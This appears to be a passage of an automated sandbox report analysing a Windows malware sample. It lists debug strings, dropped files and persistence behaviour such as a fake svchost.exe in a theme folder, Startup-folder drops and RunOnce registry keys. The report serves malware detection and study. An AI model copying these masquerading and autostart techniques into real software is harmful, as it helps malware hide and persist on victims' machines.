                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: VknMvPoCXZ.exeStatic PE information: 0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC]

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeFile created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeFile created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to dropped file
                      Creates autostart registry keys with suspicious namesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe\:Zone.Identifier:$DATAJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
